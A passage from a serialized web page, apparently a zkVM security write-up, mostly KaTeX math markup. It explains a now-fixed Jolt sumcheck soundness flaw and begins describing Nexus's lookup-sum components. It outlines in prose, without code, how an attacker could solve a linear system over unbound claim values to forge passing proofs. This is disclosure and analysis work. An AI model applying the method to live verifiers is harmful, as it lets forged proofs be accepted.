[118233],{"type":32,"value":289},{"type":26,"tag":137,"props":118235,"children":118237},{"className":118236,"style":281},[184],[],{"type":26,"tag":137,"props":118239,"children":118241},{"className":118240},[151],[118242,118247,118304,118308,118366,118370,118375],{"type":26,"tag":137,"props":118243,"children":118246},{"className":118244,"style":118245},[156],"height:1.0497em;vertical-align:-0.2997em;",[],{"type":26,"tag":137,"props":118248,"children":118250},{"className":118249},[3722],[118251,118256],{"type":26,"tag":137,"props":118252,"children":118254},{"className":118253,"style":3725},[3722,3723,3724],[118255],{"type":32,"value":3728},{"type":26,"tag":137,"props":118257,"children":118259},{"className":118258},[236],[118260],{"type":26,"tag":137,"props":118261,"children":118263},{"className":118262},[241,417],[118264,118293],{"type":26,"tag":137,"props":118265,"children":118267},{"className":118266},[246],[118268,118288],{"type":26,"tag":137,"props":118269,"children":118271},{"className":118270,"style":116822},[251],[118272],{"type":26,"tag":137,"props":118273,"children":118274},{"style":24239},[118275,118279],{"type":26,"tag":137,"props":118276,"children":118278},{"className":118277,"style":262},[261],[],{"type":26,"tag":137,"props":118280,"children":118282},{"className":118281},[267,268,269,270],[118283],{"type":26,"tag":137,"props":118284,"children":118286},{"className":118285},[169,170,270],[118287],{"type":32,"value":506},{"type":26,"tag":137,"props":118289,"children":118291},{"className":118290},[453],[118292],{"type":32,"value":456},{"type":26,"tag":137,"props":118294,"children":118296},{"className":118295},[246],[118297],{"type":26,"tag":137,"props":118298,"children":118300},{"className":118299,"style":117102},[251],[118301],{"type":26,"tag":137,"props":118302,"children":118303},{},[],{"type":26,"tag":137,"props":118305,"children":118307},{"className":118306,"style":185},[184],[],{"type":26,"tag":137,"props":118309,"children":118311},{"className":118310},[169],[118312,118317],{"type":26,"tag":137,"props":118313,"children":118315},{"className":118314,"style":117702},[169,170],[118316],{"type":32,"value":117705},{"type":26,"tag":137,"props":118318,"children":118320},{"className":118319},[236],[118321],{"type":26,"tag":137,"props":118322,"children":118324},{"className":118323},[241,417],[118325,118355],{"type":26,"tag":137,"props":118326,"children":118328},{"className":118327},[246],[118329,118350],{"type":26,"tag":137,"props":118330,"children":118332},{"className":118331,"style":556},[251],[118333],{"type":26,"tag":137,"props":118334,"children":118336},{"style":118335},"top:-2.55em;margin-left:-0.0037em;margin-right:0.05em;",[118337,118341],{"type":26,"tag":137,"props":118338,"children":118340},{"className":118339,"style":262},[261],[],{"type":26,"tag":137,"props":118342,"children":118344},{"className":118343},[267,268,269,270],[118345],{"type":26,"tag":137,"props":118346,"children":118348},{"className":118347},[169,170,270],[118349],{"type":32,"value":506},{"type":26,"tag":137,"props":118351,"children":118353},{"className":118352},[453],[118354],{"type":32,"value":456},{"type":26,"tag":137,"props":118356,"children":118358},{"className":118357},[246],[118359],{"type":26,"tag":137,"props":118360,"children":118362},{"className":118361,"style":464},[251],[118363],{"type":26,"tag":137,"props":118364,"children":118365},{},[],{"type":26,"tag":137,"props":118367,"children":118369},{"className":118368,"style":348},[184],[],{"type":26,"tag":137,"props":118371,"children":118373},{"className":118372},[353],[118374],{"type":32,"value":2172},{"type":26,"tag":137,"props":118376,"children":118378},{"className":118377,"style":348},[184],[],{"type":26,"tag":137,"props":118380,"children":118382},{"className":118381},[151],[118383,118387],{"type":26,"tag":137,"props":118384,"children":118386},{"className":118385,"style":113616},[156],[],{"type":26,"tag":137,"props":118388,"children":118390},{"className":118389},[169],[118391,118396],{"type":26,"tag":137,"props":118392,"children":118394},{"className":118393,"style":1517},[169,170],[118395],{"type":32,"value":1520},{"type":26,"tag":137,"props":118397,"children":118399},{"className":118398},[236],[118400],{"type":26,"tag":137,"props":118401,"children":118403},{"className":118402},[241,417],[118404,118433],{"type":26,"tag":137,"props":118405,"children":118407},{"className":118406},[246],[118408,118428],{"type":26,"tag":137,"props":118409,"children":118411},{"className":118410,"style":556},[251],[118412],{"type":26,"tag":137,"props":118413,"children":118414},{"style":113049},[118415,118419],{"type":26,"tag":137,"props":118416,"children":118418},{"className":118417,"style":262},[261],[],{"type":26,"tag":137,"props":118420,"children":118422},{"className":118421},[267,268,269,270],[118423],{"type":26,"tag":137,"props":118424,"children":118426},{"className":118425},[169,170,270],[118427],{"type":32,"value":506},{"type":26,"tag":137,"props":118429,"children":118431},{"className":118430},[453],[118432],{"type":32,"value":456},{"type":26,"tag":137,"props":118434,"children":118436},{"className":118435},[246],[118437],{"type":26,"tag":137,"props":118438,"children":118440},{"className":118439,"style":464},[251],[118441],{"type":26,"tag":137,"props":118442,"children":118443},{},[],{"type":26,"tag":35,"props":118445,"children":118446},{},[118447,118449,118526,118528,118533,118535,118612,118614,118691,118693,118770],{"type":32,"value":118448},"where ",{"type":26,"tag":130,"props":118450,"children":118452},{"className":118451},[133,134],[118453],{"type":26,"tag":137,"props":118454,"children":118456},{"className":118455},[140],[118457],{"type":26,"tag":137,"props":118458,"children":118460},{"className":118459,"ariaHidden":146},[145],[118461],{"type":26,"tag":137,"props":118462,"children":118464},{"className":118463},[151],[118465,118469],{"type":26,"tag":137,"props":118466,"children":118468},{"className":118467,"style":612},[156],[],{"type":26,"tag":137,"props":118470,"children":118472},{"className":118471},[169],[118473,118478],{"type":26,"tag":137,"props":118474,"children":118476},{"className":118475,"style":117702},[169,170],[118477],{"type":32,"value":117705},{"type":26,"tag":137,"props":118479,"children":118481},{"className":118480},[236],[118482],{"type":26,"tag":137,"props":118483,"children":118485},{"className":118484},[241,417],[118486,118515],{"type":26,"tag":137,"props":118487,"children":118489},{"className":118488},[246],[118490,118510],{"type":26,"tag":137,"props":118491,"children":118493},{"className":118492,"style":556},[251],[118494],{"type":26,"tag":137,"props":118495,"children":118496},{"style":118335},[118497,118501],{"type":26,"tag":137,"props":118498,"children":118500},{"className":118499,"style":262},[261],[],{"type":26,"tag":137,"props":118502,"children":118504},{"className":118503},[267,268,269,270],[118505],{"type":26,"tag":137,"props":118506,"children":118508},{"className":118507},[169,170,270],[118509],{"type":32,"value":506},{"type":26,"tag":137,"props":118511,"children":118513},{"className":118512},[453],[118514],{"type":32,"value":456},{"type":26,"tag":137,"props":118516,"children":118518},{"className":118517},[246],[118519],{"type":26,"tag":137,"props":118520,"children":118522},{"className":118521,"style":464},[251],[118523],{"type":26,"tag":137,"props":118524,"children":118525},{},[],{"type":32,"value":118527}," are random coefficients derived from the transcript. Since ",{"type":26,"tag":130,"props":118529,"children":118531},{"className":118530},[],[118532],{"type":32,"value":118076},{"type":32,"value":118534}," (containing ",{"type":26,"tag":130,"props":118536,"children":118538},{"className":118537},[133,134],[118539],{"type":26,"tag":137,"props":118540,"children":118542},{"className":118541},[140],[118543],{"type":26,"tag":137,"props":118544,"children":118546},{"className":118545,"ariaHidden":146},[145],[118547],{"type":26,"tag":137,"props":118548,"children":118550},{"className":118549},[151],[118551,118555],{"type":26,"tag":137,"props":118552,"children":118554},{"className":118553,"style":113616},[156],[],{"type":26,"tag":137,"props":118556,"children":118558},{"className":118557},[169],[118559,118564],{"type":26,"tag":137,"props":118560,"children":118562},{"className":118561,"style":1517},[169,170],[118563],{"type":32,"value":1520},{"type":26,"tag":137,"props":118565,"children":118567},{"className":118566},[236],[118568],{"type":26,"tag":137,"props":118569,"children":118571},{"className":118570},[241,417],[118572,118601],{"type":26,"tag":137,"props":118573,"children":118575},{"className":118574},[246],[118576,118596],{"type":26,"tag":137,"props":118577,"children":118579},{"className":118578,"style":556},[251],[118580],{"type":26,"tag":137,"props":118581,"children":118582},{"style":113049},[118583,118587],{"type":26,"tag":137,"props":118584,"children":118586},{"className":118585,"style":262},[261],[],{"type":26,"tag":137,"props":118588,"children":118590},{"className":118589},[267,268,269,270],[118591],{"type":26,"tag":137,"props":118592,"children":118594},{"className":118593},[169,170,270],[118595],{"type":32,"value":506},{"type":26,"tag":137,"props":118597,"children":118599},{"className":118598},[453],[118600],{"type":32,"value":456},{"type":26,"tag":137,"props":118602,"children":118604},{"className":118603},[246],[118605],{"type":26,"tag":137,"props":118606,"children":118608},{"className":118607,"style":464},[251],[118609],{"type":26,"tag":137,"props":118610,"children":118611},{},[],{"type":32,"value":118613},") were not in the transcript, the ",{"type":26,"tag":130,"props":118615,"children":118617},{"className":118616},[133,134],[118618],{"type":26,"tag":137,"props":118619,"children":118621},{"className":118620},[140],[118622],{"type":26,"tag":137,"props":118623,"children":118625},{"className":118624,"ariaHidden":146},[145],[118626],{"type":26,"tag":137,"props":118627,"children":118629},{"className":118628},[151],[118630,118634],{"type":26,"tag":137,"props":118631,"children":118633},{"className":118632,"style":612},[156],[],{"type":26,"tag":137,"props":118635,"children":118637},{"className":118636},[169],[118638,118643],{"type":26,"tag":137,"props":118639,"children":118641},{"className":118640,"style":117702},[169,170],[118642],{"type":32,"value":117705},{"type":26,"tag":137,"props":118644,"children":118646},{"className":118645},[236],[118647],{"type":26,"tag":137,"props":118648,"children":118650},{"className":118649},[241,417],[118651,118680],{"type":26,"tag":137,"props":118652,"children":118654},{"className":118653},[246],[118655,118675],{"type":26,"tag":137,"props":118656,"children":118658},{"className":118657,"style":556},[251],[118659],{"type":26,"tag":137,"props":118660,"children":118661},{"style":118335},[118662,118666],{"type":26,"tag":137,"props":118663,"children":118665},{"className":118664,"style":262},[261],[],{"type":26,"tag":137,"props":118667,"children":118669},{"className":118668},[267,268,269,270],[118670],{"type":26,"tag":137,"props":118671,"children":118673},{"className":118672},[169,170,270],[118674],{"type":32,"value":506},{"type":26,"tag":137,"props":118676,"children":118678},{"className":118677},[453],[118679],{"type":32,"value":456},{"type":26,"tag":137,"props":118681,"children":118683},{"className":118682},[246],[118684],{"type":26,"tag":137,"props":118685,"children":118687},{"className":118686,"style":464},[251],[118688],{"type":26,"tag":137,"props":118689,"children":118690},{},[],{"type":32,"value":118692}," values are independent of ",{"type":26,"tag":130,"props":118694,"children":118696},{"className":118695},[133,134],[118697],{"type":26,"tag":137,"props":118698,"children":118700},{"className":118699},[140],[118701],{"type":26,"tag":137,"props":118702,"children":118704},{"className":118703,"ariaHidden":146},[145],[118705],{"type":26,"tag":137,"props":118706,"children":118708},{"className":118707},[151],[118709,118713],{"type":26,"tag":137,"props":118710,"children":118712},{"className":118711,"style":113616},[156],[],{"type":26,"tag":137,"props":118714,"children":118716},{"className":118715},[169],[118717,118722],{"type":26,"tag":137,"props":118718,"children":118720},{"className":118719,"style":1517},[169,170],[118721],{"type":32,"value":1520},{"type":26,"tag":137,"props":118723,"children":118725},{"className":118724},[236],[118726],{"type":26,"tag":137,"props":118727,"children":118729},{"className":118728},[241,417],[118730,118759],{"type":26,"tag":137,"props":118731,"children":118733},{"className":118732},[246],[118734,118754],{"type":26,"tag":137,"props":118735,"children":118737},{"className":118736,"style":556},[251],[118738],{"type":26,"tag":137,"props":118739,"children":118740},{"style":113049},[118741,118745],{"type":26,"tag":137,"props":118742,"children":118744},{"className":118743,"style":262},[261],[],{"type":26,"tag":137,"props":118746,"children":118748},{"className":118747},[267,268,269,270],[118749],{"type":26,"tag":137,"props":118750,"children":118752},{"className":118751},[169,170,270],[118753],{"type":32,"value":506},{"type":26,"tag":137,"props":118755,"children":118757},{"className":118756},[453],[118758],{"type":32,"value":456},{"type":26,"tag":137,"props":118760,"children":118762},{"className":118761},[246],[118763],{"type":26,"tag":137,"props":118764,"children":118766},{"className":118765,"style":464},[251],[118767],{"type":26,"tag":137,"props":118768,"children":118769},{},[],{"type":32,"value":470},{"type":26,"tag":35,"props":118772,"children":118773},{},[118774],{"type":26,"tag":84,"props":118775,"children":118776},{},[118777],{"type":32,"value":118778},"Why it's linear:",{"type":26,"tag":35,"props":118780,"children":118781},{},[118782,118784],{"type":32,"value":118783},"Due to the compression optimization (prover omits one less coefficient per round), the final verification equation traces back through the rounds and becomes linear in the input claim ",{"type":26,"tag":130,"props":118785,"children":118787},{"className":118786},[133,134],[118788],{"type":26,"tag":137,"props":118789,"children":118791},{"className":118790},[140],[118792],{"type":26,"tag":137,"props":118793,"children":118795},{"className":118794,"ariaHidden":146},[145],[118796],{"type":26,"tag":137,"props":118797,"children":118799},{"className":118798},[151],[118800,118804],{"type":26,"tag":137,"props":118801,"children":118803},{"className":118802,"style":1512},[156],[],{"type":26,"tag":137,"props":118805,"children":118807},{"className":118806,"style":1517},[169,170],[118808],{"type":32,"value":1520},{"type":26,"tag":35,"props":118810,"children":118811},{},[118812],{"type":26,"tag":130,"props":118813,"children":118815},{"className":118814},[133,134],[118816],{"type":26,"tag":137,"props":118817,"children":118819},{"className":118818},[140],[118820],{"type":26,"tag":137,"props":118821,"children":118823},{"className":118822,"ariaHidden":146},[145],[118824,118913,118939,118965],{"type":26,"tag":137,"props":118825,"children":118827},{"className":118826},[151],[118828,118832,118900,118904,118909],{"type":26,"tag":137,"props":118829,"children":118831},{"className":118830,"style":113616},[156],[],{"type":26,"tag":137,"props":118833,"children":118835},{"className":118834},[169],[118836,118842],{"type":26,"tag":137,"props":118837,"children":118839},{"className":118838,"style":1843},[169,170],[118840],{"type":32,"value":118841},"C",{"type":26,"tag":137,"props":118843,"children":118845},{"className":118844},[236],[118846],{"type":26,"tag":137,"props":118847,"children":118849},{"className":118848},[241,417],[118850,118889],{"type":26,"tag":137,"props":118851,"children":118853},{"className":118852},[246],[118854,118884],{"type":26,"tag":137,"props":118855,"children":118858},{"className":118856,"style":118857},[251],"height:0.3361em;",[118859],{"type":26,"tag":137,"props":118860,"children":118861},{"style":2598},[118862,118866],{"type":26,"tag":137,"props":118863,"children":118865},{"className":118864,"style":262},[261],[],{"type":26,"tag":137,"props":118867,"children":118869},{"className":118868},[267,268,269,270],[118870],{"type":26,"tag":137,"props":118871,"children":118873},{"className":118872},[169,270],[118874],{"type":26,"tag":137,"props":118875,"children":118877},{"className":118876},[169,32,270],[118878],{"type":26,"tag":137,"props":118879,"children":118881},{"className":118880},[169,270],[118882],{"type":32,"value":118883},"final",{"type":26,"tag":137,"props":118885,"children":118887},{"className":118886},[453],[118888],{"type":32,"value":456},{"type":26,"tag":137,"props":118890,"children":118892},{"className":118891},[246],[118893],{"type":26,"tag":137,"props":118894,"children":118896},{"className":118895,"style":464},[251],[118897],{"type":26,"tag":137,"props":118898,"children":118899},{},[],{"type":26,"tag":137,"props":118901,"children":118903},{"className":118902,"style":281},[184],[],{"type":26,"tag":137,"props":118905,"children":118907},{"className":118906},[286],[118908],{"type":32,"value":289},{"type":26,"tag":137,"props":118910,"children":118912},{"className":118911,"style":281},[184],[],{"type":26,"tag":137,"props":118914,"children":118916},{"className":118915},[151],[118917,118921,118926,118930,118935],{"type":26,"tag":137,"props":118918,"children":118920},{"className":118919,"style":117697},[156],[],{"type":26,"tag":137,"props":118922,"children":118924},{"className":118923},[169,170],[118925],{"type":32,"value":41},{"type":26,"tag":137,"props":118927,"children":118929},{"className":118928,"style":348},[184],[],{"type":26,"tag":137,"props":118931,"children":118933},{"className":118932},[353],[118934],{"type":32,"value":2172},{"type":26,"tag":137,"props":118936,"children":118938},{"className":118937,"style":348},[184],[],{"type":26,"tag":137,"props":118940,"children":118942},{"className":118941},[151],[118943,118947,118952,118956,118961],{"type":26,"tag":137,"props":118944,"children":118946},{"className":118945,"style":117726},[156],[],{"type":26,"tag":137,"props":118948,"children":118950},{"className":118949,"style":1517},[169,170],[118951],{"type":32,"value":1520},{"type":26,"tag":137,"props":118953,"children":118955},{"className":118954,"style":348},[184],[],{"type":26,"tag":137,"props":118957,"children":118959},{"className":118958},[353],[118960],{"type":32,"value":356},{"type":26,"tag":137,"props":118962,"children":118964},{"className":118963,"style":348},[184],[],{"type":26,"tag":137,"props":118966,"children":118968},{"className":118967},[151],[118969,118973],{"type":26,"tag":137,"props":118970,"children":118972},{"className":118971,"style":95563},[156],[],{"type":26,"tag":137,"props":118974,"children":118976},{"className":118975},[169,170],[118977],{"type":32,"value":2832},{"type":26,"tag":35,"props":118979,"children":118980},{},[118981,118982,119021,119023,119048,119050,119180,119182,119303],{"type":32,"value":118448},{"type":26,"tag":130,"props":118983,"children":118985},{"className":118984},[133,134],[118986],{"type":26,"tag":137,"props":118987,"children":118989},{"className":118988},[140],[118990],{"type":26,"tag":137,"props":118991,"children":118993},{"className":118992,"ariaHidden":146},[145],[118994],{"type":26,"tag":137,"props":118995,"children":118997},{"className":118996},[151],[118998,119002,119007,119012,119016],{"type":26,"tag":137,"props":118999,"children":119001},{"className":119000,"style":3835},[156],[],{"type":26,"tag":137,"props":119003,"children":119005},{"className":119004},[169,170],[119006],{"type":32,"value":41},{"type":26,"tag":137,"props":119008,"children":119010},{"className":119009},[177],[119011],{"type":32,"value":180},{"type":26,"tag":137,"props":119013,"children":119015},{"className":119014,"style":185},[184],[],{"type":26,"tag":137,"props":119017,"children":119019},{"className":119018},[169,170],[119020],{"type":32,"value":2832},{"type":32,"value":119022}," are determined by the transcript (independent of ",{"type":26,"tag":130,"props":119024,"children":119026},{"className":119025},[133,134],[119027],{"type":26,"tag":137,"props":119028,"children":119030},{"className":119029},[140],[119031],{"type":26,"tag":137,"props":119032,"children":119034},{"className":119033,"ariaHidden":146},[145],[119035],{"type":26,"tag":137,"props":119036,"children":119038},{"className":119037},[151],[119039,119043],{"type":26,"tag":137,"props":119040,"children":119042},{"className":119041,"style":1512},[156],[],{"type":26,"tag":137,"props":119044,"children":119046},{"className":119045,"style":1517},[169,170],[119047],{"type":32,"value":1520},{"type":32,"value":119049},"). The verifier checks that ",{"type":26,"tag":130,"props":119051,"children":119053},{"className":119052},[133,134],[119054],{"type":26,"tag":137,"props":119055,"children":119057},{"className":119056},[140],[119058],{"type":26,"tag":137,"props":119059,"children":119061},{"className":119060,"ariaHidden":146},[145],[119062,119148],{"type":26,"tag":137,"props":119063,"children":119065},{"className":119064},[151],[119066,119070,119135,119139,119144],{"type":26,"tag":137,"props":119067,"children":119069},{"className":119068,"style":113616},[156],[],{"type":26,"tag":137,"props":119071,"children":119073},{"className":119072},[169],[119074,119079],{"type":26,"tag":137,"props":119075,"children":119077},{"className":119076,"style":1843},[169,170],[119078],{"type":32,"value":118841},{"type":26,"tag":137,"props":119080,"children":119082},{"className":119081},[236],[119083],{"type":26,"tag":137,"props":119084,"children":119086},{"className":119085},[241,417],[119087,119124],{"type":26,"tag":137,"props":119088,"children":119090},{"className":119089},[246],[119091,119119],{"type":26,"tag":137,"props":119092,"children":119094},{"className":119093,"style":118857},[251],[119095],{"type":26,"tag":137,"props":119096,"children":119097},{"style":2598},[119098,119102],{"type":26,"tag":137,"props":119099,"children":119101},{"className":119100,"style":262},[261],[],{"type":26,"tag":137,"props":119103,"children":119105},{"className":119104},[267,268,269,270],[119106],{"type":26,"tag":137,"props":119107,"children":119109},{"className":119108},[169,270],[119110],{"type":26,"tag":137,"props":119111,"children":119113},{"className":119112},[169,32,270],[119114],{"type":26,"tag":137,"props":119115,"children":119117},{"className":119116},[169,270],[119118],{"type":32,"value":118883},{"type":26,"tag":137,"props":119120,"children":119122},{"className":119121},[453],[119123],{"type":32,"value":456},{"type":26,"tag":137,"props":119125,"children":119127},{"className":119126},[246],[119128],{"type":26,"tag":137,"props":119129,"children":119131},{"className":119130,"style":464},[251],[119132],{"type":26,"tag":137,"props":119133,"children":119134},{},[],{"type":26,"tag":137,"props":119136,"children":119138},{"className":119137,"style":281},[184],[],{"type":26,"tag":137,"props":119140,"children":119142},{"className":119141},[286],[119143],{"type":32,"value":289},{"type":26,"tag":137,"props":119145,"children":119147},{"className":119146,"style":281},[184],[],{"type":26,"tag":137,"props":119149,"children":119151},{"className":119150},[151],[119152,119156,119166,119171],{"type":26,"tag":137,"props":119153,"children":119155},{"className":119154,"style":97046},[156],[],{"type":26,"tag":137,"props":119157,"children":119159},{"className":119158},[169,32],[119160],{"type":26,"tag":137,"props":119161,"children":119163},{"className":119162},[169],[119164],{"type":32,"value":119165},"expected",{"type":26,"tag":137,"props":119167,"children":119169},{"className":119168,"style":621},[169],[119170],{"type":32,"value":5666},{"type":26,"tag":137,"props":119172,"children":119174},{"className":119173},[169,32],[119175],{"type":26,"tag":137,"props":119176,"children":119178},{"className":119177},[169],[119179],{"type":32,"value":40144},{"type":32,"value":119181}," (from PCS opening), this becomes ",{"type":26,"tag":130,"props":119183,"children":119185},{"className":119184},[133,134],[119186],{"type":26,"tag":137,"props":119187,"children":119189},{"className":119188},[140],[119190],{"type":26,"tag":137,"props":119191,"children":119193},{"className":119192,"ariaHidden":146},[145],[119194,119220,119246,119272],{"type":26,"tag":137,"props":119195,"children":119197},{"className":119196},[151],[119198,119202,119207,119211,119216],{"type":26,"tag":137,"props":119199,"children":119201},{"className":119200,"style":117697},[156],[],{"type":26,"tag":137,"props":119203,"children":119205},{"className":119204},[169,170],[119206],{"type":32,"value":41},{"type":26,"tag":137,"props":119208,"children":119210},{"className":119209,"style":348},[184],[],{"type":26,"tag":137,"props":119212,"children":119214},{"className":119213},[353],[119215],{"type":32,"value":2172},{"type":26,"tag":137,"props":119217,"children":119219},{"className":119218,"style":348},[184],[],{"type":26,"tag":137,"props":119221,"children":119223},{"className":119222},[151],[119224,119228,119233,119237,119242],{"type":26,"tag":137,"props":119225,"children":119227},{"className":119226,"style":117726},[156],[],{"type":26,"tag":137,"props":119229,"children":119231},{"className":119230,"style":1517},[169,170],[119232],{"type":32,"value":1520},{"type":26,"tag":137,"props":119234,"children":119236},{"className":119235,"style":348},[184],[],{"type":26,"tag":137,"props":119238,"children":119240},{"className":119239},[353],[119241],{"type":32,"value":356},{"type":26,"tag":137,"props":119243,"children":119245},{"className":119244,"style":348},[184],[],{"type":26,"tag":137,"props":119247,"children":119249},{"className":119248},[151],[119250,119254,119259,119263,119268],{"type":26,"tag":137,"props":119251,"children":119253},{"className":119252,"style":95563},[156],[],{"type":26,"tag":137,"props":119255,"children":119257},{"className":119256},[169,170],[119258],{"type":32,"value":2832},{"type":26,"tag":137,"props":119260,"children":119262},{"className":119261,"style":281},[184],[],{"type":26,"tag":137,"props":119264,"children":119266},{"className":119265},[286],[119267],{"type":32,"value":289},{"type":26,"tag":137,"props":119269,"children":119271},{"className":119270,"style":281},[184],[],{"type":26,"tag":137,"props":119273,"children":119275},{"className":119274},[151],[119276,119280,119289,119294],{"type":26,"tag":137,"props":119277,"children":119279},{"className":119278,"style":97046},[156],[],{"type":26,"tag":137,"props":119281,"children":119283},{"className":119282},[169,32],[119284],{"type":26,"tag":137,"props":119285,"children":119287},{"className":119286},[169],[119288],{"type":32,"value":119165},{"type":26,"tag":137,"props":119290,"children":119292},{"className":119291,"style":621},[169],[119293],{"type":32,"value":5666},{"type":26,"tag":137,"props":119295,"children":119297},{"className":119296},[169,32],[119298],{"type":26,"tag":137,"props":119299,"children":119301},{"className":119300},[169],[119302],{"type":32,"value":40144},{"type":32,"value":470},{"type":26,"tag":35,"props":119305,"children":119306},{},[119307],{"type":32,"value":119308},"Because multiple claims are coupled across verification stages, the attacker may need to adjust a small set of claim values simultaneously to satisfy all affected constraints.",{"type":26,"tag":35,"props":119310,"children":119311},{},[119312],{"type":32,"value":119313},"This can be exploited by solving a small linear system over a handful of unbound claim values so all affected checks pass simultaneously.",{"type":26,"tag":35,"props":119315,"children":119316},{},[119317,119322,119324],{"type":26,"tag":84,"props":119318,"children":119319},{},[119320],{"type":32,"value":119321},"Status:",{"type":32,"value":119323}," Fixed on October 3, 2025 via ",{"type":26,"tag":41,"props":119325,"children":119328},{"href":119326,"rel":119327},"https://github.com/a16z/jolt/pull/981",[45],[119329],{"type":32,"value":119330},"PR #981",{"type":26,"tag":3265,"props":119332,"children":119333},{},[],{"type":26,"tag":118,"props":119335,"children":119337},{"id":119336},"nexus",[119338],{"type":32,"value":110444},{"type":26,"tag":35,"props":119340,"children":119341},{},[119342],{"type":32,"value":119343},"Nexus is a zkVM built on the Stwo prover (from StarkWare). It uses STARKs with logup lookup arguments.",{"type":26,"tag":35,"props":119345,"children":119346},{},[119347,119349,119354],{"type":32,"value":119348},"Nexus splits verification into ",{"type":26,"tag":84,"props":119350,"children":119351},{},[119352],{"type":32,"value":119353},"components",{"type":32,"value":119355}," such as instruction execution, memory, registers, etc. Each component handles a subset of constraints.",{"type":26,"tag":35,"props":119357,"children":119358},{},[119359,119361,119366],{"type":32,"value":119360},"Each component emits and consumes lookup tuples. The component's ",{"type":26,"tag":130,"props":119362,"children":119364},{"className":119363},[],[119365],{"type":32,"value":117479},{"type":32,"value":119367}," summarizes its net contribution:",{"type":26,"tag":35,"props":119369,"children":119370},{},[119371],{"type":26,"tag":130,"props":119372,"children":119374},{"className":119373},[133,134],[119375],{"type":26,"tag":137,"props":119376,"children":119378},{"className":119377},[140],[119379],{"type":26,"tag":137,"props":119380,"children":119382},{"className":119381,"ariaHidden":146},[145],[119383,119479,119728],{"type":26,"tag":137,"props":119384,"children":119386},{"className":119385},[151],[119387,119391,119400,119405,119466,119470,119475],{"type":26,"tag":137,"props":119388,"children":119390},{"className":119389,"style":97046},[156],[],{"type":26,"tag":137,"props":119392,"children":119394},{"className":119393},[169,32],[119395],{"type":26,"tag":137,"props":119396,"children":119398},{"className":119397},[169],[119399],{"type":32,"value":116708},{"type":26,"tag":137,"props":119401,"children":119403},{"className":119402,"style":621},[169],[119404],{"type":32,"value":5666},{"type":26,"tag":137,"props":119406,"children":119408},{"className":119407},[169],[119409,119418],{"type":26,"tag":137,"props":119410,"children":119412},{"className":119411},[169,32],[119413],{"type":26,"tag":137,"props":119414,"children":119416},{"className":119415},[169],[119417],{"type":32,"value":79235},{"type":26,"tag":137,"props":119419,"children":119421},{"className":119420},[236],[119422],{"type":26,"tag":137,"props":119423,"children":119425},{"className":119424},[241,417],[119426,119455],{"type":26,"tag":137,"props":119427,"children":119429},{"className":119428},[246],[119430,119450],{"type":26,"tag":137,"props":119431,"children":119433},{"className":119432,"style":556},[251],[119434],{"type":26,"tag":137,"props":119435,"children":119436},{"style":116745},[119437,119441],{"type":26,"tag":137,"props":119438,"children":119440},{"className":119439,"style":262},[261],[],{"type":26,"tag":137,"props":119442,"children":119444},{"className":119443},[267,268,269,270],[119445],{"type":26,"tag":137,"props":119446,"children":119448},{"className":119447},[169,170,270],[119449],{"type":32,"value":506},{"type":26,"tag":137,"props":119451,"children":119453},{"className":119452},[453],[119454],{"type":32,"value":456},{"type":26,"tag":137,"props":119456,"children":119458},{"className":119457},[246],[119459],{"type":26,"tag":137,"props":119460,"children":119462},{"className":119461,"style":464},[251],[119463],{"type":26,"tag":137,"props":119464,"children":119465},{},[],{"type":26,"tag":137,"props":119467,"children":119469},{"className":119468,"style":281},[184],[],{"type":26,"tag":137,"props":119471,"children":119473},{"className":119472},[286],[119474],{"type":32,"value":289},{"type":26,"tag":137,"props":119476,"children":119478},{"className":119477,"style":281},[184],[],{"type":26,"tag":137,"props":119480,"children":119482},{"className":119481},[151],[119483,119488,119545,119549,119715,119719,119724],{"type":26,"tag":137,"props":119484,"children":119487},{"className":119485,"style":119486},[156],"height:1.4734em;vertical-align:-0.6283em;",[],{"type":26,"tag":137,"props":119489,"children":119491},{"className":119490},[3722],[119492,119497],{"type":26,"tag":137,"props":119493,"children":119495},{"className":119494,"style":3725},[3722,3723,3724],[119496],{"type":32,"value":3728},{"type":26,"tag":137,"props":119498,"children":119500},{"className":119499},[236],[119501],{"type":26,"tag":137,"props":119502,"children":119504},{"className":119503},[241,417],[119505,119534],{"type":26,"tag":137,"props":119506,"children":119508},{"className":119507},[246],[119509,119529],{"type":26,"tag":137,"props":119510,"children":119512},{"className":119511,"style":116822},[251],[119513],{"type":26,"tag":137,"props":119514,"children":119515},{"style":24239},[119516,119520],{"type":26,"tag":137,"props":119517,"children":119519},{"className":119518,"style":262},[261],[],{"type":26,"tag":137,"props":119521,"children":119523},{"className":119522},[267,268,269,270],[119524],{"type":26,"tag":137,"props":119525,"children":119527},{"className":119526,"style":116838},[169,170,270],[119528],{"type":32,"value":11242},{"type":26,"tag":137,"props":119530,"children":119532},{"className":119531},[453],[119533],{"type":32,"value":456},{"type":26,"tag":137,"props":119535,"children":119537},{"className":119536},[246],[119538],{"type":26,"tag":137,"props":119539,"children":119541},{"className":119540,"style":116853},[251],[119542],{"type":26,"tag":137,"props":119543,"children":119544},{},[],{"type":26,"tag":137,"props":119546,"children":119548},{"className":119547,"style":185},[184],[],{"type":26,"tag":137,"props":119550,"children":119552},{"className":119551},[169],[119553,119557,119711],{"type":26,"tag":137,"props":119554,"children":119556},{"className":119555},[162,116136],[],{"type":26,"tag":137,"props":119558,"children":119560},{"className":119559},[116141],[119561],{"type":26,"tag":137,"props":119562,"children":119564},{"className":119563},[241,417],[119565,119699],{"type":26,"tag":137,"props":119566,"children":119568},{"className":119567},[246],[119569,119694],{"type":26,"tag":137,"props":119570,"children":119572},{"className":119571,"style":116154},[251],[119573,119663,119674],{"type":26,"tag":137,"props":119574,"children":119575},{"style":116158},[119576,119580],{"type":26,"tag":137,"props":119577,"children":119579},{"className":119578,"style":114789},[261],[],{"type":26,"tag":137,"props":119581,"children":119583},{"className":119582},[267,268,269,270],[119584],{"type":26,"tag":137,"props":119585,"children":119587},{"className":119586},[169,270],[119588,119593,119598],{"type":26,"tag":137,"props":119589,"children":119591},{"className":119590,"style":2321},[169,170,270],[119592],{"type":32,"value":2324},{"type":26,"tag":137,"props":119594,"children":119596},{"className":119595},[353,270],[119597],{"type":32,"value":1935},{"type":26,"tag":137,"props":119599,"children":119601},{"className":119600},[169,270],[119602,119612],{"type":26,"tag":137,"props":119603,"children":119605},{"className":119604},[169,32,270],[119606],{"type":26,"tag":137,"props":119607,"children":119609},{"className":119608},[169,270],[119610],{"type":32,"value":119611},"produced",{"type":26,"tag":137,"props":119613,"children":119615},{"className":119614},[236],[119616],{"type":26,"tag":137,"props":119617,"children":119619},{"className":119618},[241,417],[119620,119651],{"type":26,"tag":137,"props":119621,"children":119623},{"className":119622},[246],[119624,119646],{